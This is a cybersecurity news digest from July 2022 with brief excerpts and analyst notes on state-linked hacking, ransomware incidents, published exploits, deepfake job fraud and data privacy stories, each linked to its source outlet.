Saturday, July 02, 2022 // (IG): BB //Weekly Sponsor: Zanes Hand Made (leather works)
Chinese hackers kept up hiring drive despite FBI indictment
FROM THE MEDIA: Hackers with suspected links to China’s intelligence agencies were still advertising for new recruits to work on cyber espionage, even after the FBI indicted the perpetrators in an effort to disrupt their activities.
Hainan Tengyuan, a Chinese technology company, was actively recruiting English language translators in March according to job adverts seen by the Financial Times — nine months after US law enforcement agencies accused Beijing of setting up such companies as a “front” for spying operations against western targets.
Hainan Tengyuan is also part of a wider network of companies that has links, including common contact details and employees, with another tech firm Hainan Xiandun, which was exposed by the FBI in a 2021 indictment as a cover for the Chinese hacking group APT40.
READ THE STORY: FT
How Russian cyber army suppressed US F-35 Stealth Fighters by electronic warfare
ANALYST NOTE: With all the negative publicity due to ineffectiveness in the Ukrainian conflict could this release be propaganda? Traditionally EW is not a function of “cyber” but the Russian government absolutely has skilled APT’s and organized crime elements. Could they manipulate Air Defense via “cyber” probably but this article has some holes.
FROM THE MEDIA: While it certainly is true that Russian EW systems like the Krasukha-4 have been highly effective in jamming even US drones, Russia’s interference in Israeli military exercises within its territory seems highly unlikely.
The only situation where Russia would interfere in Israeli air operations is in Syria, where they have a deconfliction mechanism to allow IAF to strike Iranian targets. They also helped shoot down Israeli AGMs with the Buk-M2/3 supplied to the Syrian Arab Army (SAA) a few months ago.
But Russia would softly retaliate by electronically interfering in Israeli air operations only around its interests in Ukraine or Syria. The AviaPro report might be valid to the extent that GPS signal disruption has been observed in the Eastern Mediterranean since Russia specifically installed anti-drone and EW systems at its Khmeimem air base in Syria to protect from air and space surveillance.
Russian electronic jammers can disrupt signals from GLONASS, American GPS, European Galileo, and Chinese BieDou satellite navigation systems. Thus aircraft, drones, or missiles will see their GPS receivers go awry.
READ THE STORY: The Kashmir Monitor
Threat Actor Claims Responsibility For IBM and Stanford University Hack
FROM THE MEDIA: CloudSEK used its artificial intelligence (AI)-powered digital risk platform XVigil to identify a post on a cybercrime forum mentioning open source automation server platform Jenkins as one of the TTP (tactics, techniques, and procedures) used by a threat actor (TA) in attacks against IBM and Stanford University.
The module reportedly has hidden desktop takeover capabilities that would be used by the TA to get clicks on ads.
The post on the English-speaking forum was spotted by CloudSEK on May 07 2022 and contained a sample screenshot as proof of their claimed access to a Jenkins dashboard. From a technical standpoint, the TA encountered a Jenkins dashboard bypass that contained internal hosts and scripts, together with database credentials and logins.
READ THE STORY: InfoSec Mag
FBI Warns That Scammers Are Using Deepfakes to Apply for Sensitive Jobs
FROM THE MEDIA: On June 28, 2022, the FBI issued a Public Service Announcement (PSA) warning that fraudsters are using deepfakes to impersonate job applicants during online interviews and employing stolen Personally Identifiable Information (PII) to apply for positions. (Deepfakes are realistic synthetic media that are either altered or wholly created by artificial intelligence.)
This type of fraud may be used in an effort to gain access to company networks and to otherwise obtain company data. According to the FBI, the jobs targeted by scammers include remote work or work-from-home jobs in the information technology, computer programming, database, and software fields. “Notably,” the PSA from the FBI’s Internet Crime Complaint Center said, “some reported positions include access to customer PII, financial data, corporate IT databases and/or proprietary information.” This is a particularly concerning development, given the potential business and legal ramifications to businesses of unauthorized access to PII, under a mosaic of state laws and international protocols.
READ THE STORY: Wilmerhale
Employment and Labor Websites Across the US Are Offline Due to Cyberattack — How Many States are Affected?
FROM THE MEDIA: People are being cut off from services like unemployment benefits and job-seeking programs as a result of a cyberattack on software company Geographic Solutions (GSI) that began almost a week ago, The Register reported.
The Louisiana Workforce Commission said in a statement this week that GSI had to shut down state labor exchanges and unemployment claims systems, potentially having an impact on up to 40 states and Washington, DC. GSI provides services to these states.
According to the company's LinkedIn page, GSI provides online services for state and local governments in more than 35 states and creates software for things like workforce development, labor market data, and unemployment insurance. The vendor also maintains websites for government organizations in states including Indiana, Florida, North Carolina, and California.
READ THE STORY: itechpost // The Register
Zoho ManageEngine ADAudit Plus bug gets public RCE exploit
FROM THE MEDIA: Security researchers have published technical details and proof-of-concept exploit code for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activities in the Active Directory.
The vulnerability allows an unauthenticated attacker to execute code remotely and compromise Active Directory accounts. It comes with a critical severity score of 9.8 out of 10. Zoho addressed the issue at the end of March in ADAudit Plus build 7060 after security researcher Naveen Sunkavally at Horizon3.ai reported it to the company.
READ THE STORY: BleepingComputer
CISA and Coast Guard Cyber Command Warn About Hackers Leveraging Log4Shell Vulnerability on VMware Servers
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) released a joint advisory, warning that multiple threat actors, including state-sponsored and ransomware groups, are still targeting unpatched Log4Shell vulnerabilities in VMware servers.
The advisory stated that advanced persistent (APT) actors exploited Log4Shell remote code execution vulnerability CVE-2021-44228 in VMware Horizon and unified access gateway (UAG) to move laterally across the network, escalate privileges, deploy malware, and exfiltrate sensitive data. Both Internet-facing and local VMware Horizons and UAG servers were affected.
READ THE STORY: CPO MAG
DragonForce Malaysia Releases LPE Exploit, Threatens Ransomware
FROM THE MEDIA: The hacktivist group DragonForce Malaysia has released an exploit that allows Windows Server local privilege escalation (LPE) to grant access to local distribution router (LDR) capabilities. It also announced that it's adding ransomware attacks to its arsenal.
The group posted a proof of concept (PoC) of the exploit on its Telegram channel on June 23, which was subsequently analyzed by CloudSEK this week. While there's no known CVE for the bug, the group claims that the exploit can be used to bypass authentication "remotely in one second" in order to access the LDR layer, which is used to interconnect local networks at various locations of an organization.
READ THE STORY: DarkReading
Google location tracking to forget you were ever at that medical clinic
ANALYST NOTE: The auto-deletion is great but there is always a chance that the data can get stored via third party or some found loophole. Historically Google has released the data to LEO’s for prosecution example: ( New york Times // wired // forbes )
FROM THE MEDIA: Google on Friday pledged to update its location history system so that visits to medical clinics and similarly sensitive places are automatically deleted. In this post-Roe era of America, there is concern that cops and other law enforcement will demand the web giant hand over information about its users if they are suspected of breaking the law by seeking an abortion.
Google keeps a log of its users whereabouts, via its Location History functionality, and provides some controls to delete all or part of those records, or switch it off. Now, seemingly in response to the above concerns and a certain US Supreme Court decision, we're told Google's going to auto-delete some entries. "If our systems identify that someone has visited one of these places, we will delete these entries from Location History soon after they visit," said senior veep Jen Fitzpatrick. "This change will take effect in the coming weeks."
READ THE STORY: The Register
BLACK BASTA Ransomware Actors Take Aim at PRINTNIGHTMARE Flaw
FROM THE MEDIA:The Black Basta ransomware operators have been observed exploiting the Microsoft PrintNightmare vulnerability after gaining initial access in a recent attack in order to perform privileged file operations.
Black Basta has tallied up a total of 50 victims as of June 24 since its operations started in April. The ransomware has targeted a wide range of industries in the U.S. Canada, UK and Australia, including manufacturing, transportation, telecommunications and pharmaceuticals. The ransomware, which also has a Linux variant that has targeted VMware ESXi virtual machines, is known for double-extortion attacks, where data is first exfiltrated before the ransomware is deployed.
READ THE STORY: DUO
Federal authorities warn MedusaLocker ransomware targeting remote desktop vulnerabilities
FROM THE MEDIA: Researchers from Huntress have seen an increase during the last quarter in threat actors targeting RDP as an initial access point.
“If an organization has RDP, threat actors will brute force with endless username and password combinations until they succeed in gaining authenticated access,” Dray Agha, ThreatOps analyst at Huntress, said via email.
After gaining access to a network, hackers will use RDP to move laterally, free to move about without being monitored.
READ THE STORY: Cybersecurity Dive
Publishing giant Macmillan still unable to process orders after ransomware attack
FROM THE MEDIA: Publishing giant Macmillan is in the process of recovering from a ransomware attack that has left it unable to process orders electronically.
No ransomware group has come forward to claim the attack, but employees of the company initially took to Twitter to discuss the incident. Publishers Weekly was the first to report that the company was emailing customers and employees about closing its offices on Monday and Tuesday due to the attack.
READ THE STORY: The Record
Moody’s says Costa Rican response shows ‘resilience’ of sovereign governments to ransomware
FROM THE MEDIA: A pair of ransomware attacks targeting the Costa Rican government in April and May crippled computer networks and brought essential services to a standstill, but a prominent U.S. credit ratings firm is saying the episodes actually demonstrate some of the inherent resilience of sovereign governments against such hacks.
The attacks — one carried out by Conti and another by Hive — did result in significant disruption to nearly a quarter of the Costa Rican economy, with impacts on healthcare, international trade and revenue collection. The Conti infection disabled online services offered by the Ministry of Finance, while the Hive attack a month later hit the Ministry of Social Security.
READ THE STORY: SCMAG
DOJ sets new goals for responding to ransomware attacks
FROM THE MEDIA: The Justice Department said it wants to increase the percentage of reported ransomware incidents it handles to 65% by September 2023. In a strategic planning document published Friday, the Department of Justice said that by September 30, 2023, it pledges to increase “the percentage of reported ransomware incidents from which cases are opened, added to existing cases, or resolved or investigative actions are conducted within 72 hours to 65%.”
The department also wants to increase “the number of ransomware matters in which seizures or forfeitures are occurring by 10%.” The pledges were also included in the President’s Management Agenda website and were under the purview of Eun Young Choi, the recently appointed director of the National Cryptocurrency Enforcement Team at the Justice Department.
READ THE STORY: The Record
Cyberattacks on the rise in ag industry
FROM THE MEDIA: The reliance on technology to keep businesses and people going has continued to increase. That dependence has opened up possible threats to agriculture. In recent years it isn’t uncommon to hear of a cyberattack shutting down a cooperative, and other areas of the industry are vulnerable.
“There is an increasing proliferation of precision agriculture,” said Lewis Balfour, an intelligence analyst with the Federal Bureau of Investigation in Springfield, Illinois. “Now, more than ever, we have an increased use of advanced technologies like GPS and drones to increase yields. That makes the agricultural sector a more lucrative and vulnerable target for cyber threat actors.”
READ THE STORY: AG Update
What Is Leakware? Here's What You Need to Know
FROM THE MEDIA: Leakware is a subset of ransomware, which is a kind of malware used to threaten victims with their own data. In the case of a leakware attack, data is stolen by a malicious party and encrypted. This makes the data indecipherable and therefore unusable. But this encryption isn't permanent. The attacker will encrypt the data while holding the decryption key, which the victim will only be given if they meet the attacker's demands.
READ THE STORY: MUO
State Department offers up to $10 million for info on foreign election interference
FROM THE MEDIA: The State Department announced on Thursday that it is offering up to $10 million for tips about foreign interference in U.S. elections, including illegal cyber activities.
The cash, offered through the department’s Rewards for Justice program, would be for any information that leads to the identification or location of any foreign person or entity “who knowingly engaged or is engaging in foreign election interference.”
READ THE STORY: The Record
Chinese internet trolls deployed to protect rare earths stranglehold
FROM THE MEDIA: For the unsuspecting Facebook user in Texas, posts, along with the emergence of new groups on their feeds highlighting threats posed by a new rare earths separation plant, may appear legitimate.
Seemingly published by Texans, they flooded the social media platform after Australian rare earth miner, Lynas Resources (ASX: LYC), won a major U.S. Government grant to build a facility in Texas that will process rare earths from a massive mine in the west of Australia.
“My friends and I have been resisting the construction of a rare earth processing plant in Texas by Lynas. If nothing is done Lynas’ waste discharge will directly or indirectly affect the health of local residents, and this pollution is irreversible,” one Facebook post said.
READ THE STORY: Asia Markets
TikTok: Yes, some staff in China can access US data
FROM THE MEDIA: TikTok, owned by Chinese outfit ByteDance, last month said it was making an effort to minimize the amount of data from US users that gets transferred outside of America, following reports that company engineers in the Middle Kingdom had access to US customer data.
"100 percent of US user traffic is being routed to Oracle Cloud Infrastructure," TikTok said in a June 17, 2022 post, while acknowledging that customer information still got backed up to its data center in Singapore. The biz promised to delete US users' private data from its own servers and to "fully pivot to Oracle cloud servers located in the US."
READ THE STORY: The Register
Play Store still hosts malware. What’s lacking?
FROM THE MEDIA: Android’s hallmark has always been ‘openness’—the platform’s huge scale is in fact one of its core strengths. Its size, however, makes the Play Store a diverse morass for Google to guard. Yet, despite fortifying its scanning defenses for years, malicious apps still beat Play Store’s security, threatening millions of users.
Software company, Dr.Web, discovered apps with built-in adware and information-stealing malware on the Google Play Store two months ago. In a report, the researchers highlighted that at least five apps are still available in the app store, and had amassed over two million downloads. Other apps allegedly containing malicious codes have been removed by the Play Store, according to Dr.Web.
READ THE STORY: Tech HQ
Info of over 300,000 Israelis leaked as Iranian hackers target travel booking sites
FROM THE MEDIA: Iranian hackers have recently hacked into a number of popular Israeli travel booking websites, managing to obtain the personal information of over 300,000 Israelis. The incident occurred two weeks ago and was confirmed by Israel’s Privacy Protection Authority on Thursday evening.
The attack affected websites operated by Gol Tours LTD, a tourist company that owns over 20 travel booking websites. The leaked information includes telephone numbers, addresses, dates and locations of booked vacations, and sensitive medical information, the authority said in a statement.
READ THE STORY: The Times of Israel
New 'SessionManager' Backdoor Targeting Microsoft Exchange Servers Worldwide
FROM THE MEDIA: Kaspersky security experts have discovered new malware targeting Microsoft Exchange servers belonging to several organizations worldwide.
Dubbed “SessionManager” and first spotted by the company in early 2022, the backdoor enables threat actors to keep “persistent, update-resistant and rather stealth access to the IT infrastructure of a targeted organization.”
READ THE STORY: InfoSec Mag
NYDFS Imposes Fine of $5 Million on Carnival for Cybersecurity Breaches
FROM THE MEDIA: On June 24, 2022, the New York State Department of Financial Services (“NYDFS” or the “Department”) announced it had entered into a $5 million settlement with Carnival Corp. (“Carnival”), the world’s largest cruise-ship operator, for violations of the Cybersecurity Regulation (23 NYCRR Part 500) in connection with four cybersecurity events between 2019 and 2021, including two ransomware events.
READ THE STORY: National Law Review
Microsoft Spots Updated Cryptomining Malware Tool Targeting Linux Systems
FROM THE MEDIA: Microsoft’s Security Intelligence team has issued a new warning against a known cloud threat actor (TA) group. Tracked as 8220 and active since early 2017, the group would have now updated its malware toolset to breach Linux servers in order to install crypto miners as part of a long-running campaign. “The updates include the deployment of new versions of a cryptominer and an IRC bot, as well the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a Twitter thread on Thursday.
READ THE STORY: InfoSec Mag
Flagstar Bank breach another example of hacker threat to financial sector
FROM THE MEDIA: Cybersecurity risks to financial institutions, such as banks and financial services, have grown in recent years despite the industry being heavily regulated to protect customers' data. Flagstar Bank, which operates 150 branches and is one of the largest mortgage servicers in the U.S., acknowledged on June 17 it suffered a data breach after hackers gained access to customers' personal information. The cyberattack on Flagstar Bank is not alone as financial institutions have become leading targets for cyber criminals. According to Check Point, there were 703 reported cyberattack attempts per week in 2021 within the industry, which was a 53% increase from 2020.
READ THE STORY: SCMAG
Moscow Uses Hacker Gangs to Carry Out Cyberattacks
FROM THE MEDIA: Russia relies on hacker gangs to launch disruptive attacks against Western infrastructure, the Organized Crime and Corruption Reporting Project (OCCRP), an international investigative journalism organization specializing in organized crime, indicated on June 3.
“Russia makes agreements with different Russian cybercriminal groups […], in exchange for leniency on certain crimes, if they help it orchestrate disruptive campaigns and cause economic damage against U.S. and European organizations,” Víctor Ruíz, founder of the SILIKN cybersecurity center in Mexico, told Diálogo.
“Cybercriminal groups help the Kremlin to have a greater reach. In case they are detected or identified Moscow can disassociate from them,” Ruíz added. “These groups are not only made up of Russian nationals but [of people] from other parts of the world. In addition, they recruit disgruntled employees to give them access to the systems of the organizations to be attacked.”
READ THE STORY: Dialogo Americas
Items of interest
Key Lawmaker: Digital Passport Only Way to Deter Crypto Use for Ransomware Attacks
FROM THE MEDIA: During a hearing that highlighted the dual-sided implications technology often creates for privacy and security, Rep. Bill Foster, D-Ill., promoted the idea of regulating cryptocurrency exchanges by implementing a digital passport, saying it’s the only way to make the industry less attractive to perpetrators of ransomware attacks and other transnational crime.
“You're ultimately going to need to have a uniquely identified, biometrically de-duped crypto driver's license, as it were, if you're really going to prevent it from being used for ransomware and all this sort of thing,” Foster said. “That's going to involve setting up very much like I guess a passport system,” he said, noting, “one of the tough things that we're going to face as a government is sharing data with other governments.”
Foster is chair of the House Science Committee’s panel on investigations and oversight. His comments during a hearing the subcommittee held Wednesday on “privacy in the age of biometrics,” come as some of his fellow Democrats in the House and Senate push federal agencies to stop doing business with facial-recognition firm Clearview AI and generally spurn the technology.
READ THE STORY: Nextgov
What an Identity Theft Victim Can Teach Us About Cybercrime (Video)
FROM THE MEDIA: Every year millions become victims of identity theft and many other cyber-attacks, including ransomware, phishing, scams, and more. Sandra Estok reveals a fresh, inspiring, and empowering way to relate to technology. Sharing her nightmare story and becoming a cybersecurity expert, she teaches us about cybercrime, Cybermonsters, and so much more.
The Role of Cryptocurrency in Cybercrime Panel (Video)
FROM THE MEDIA: Learn about innovations in the use of cryptocurrency by cybercriminals, the challenges that presents to regulators and law enforcement, the consequences for business, and how to find a path forward.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com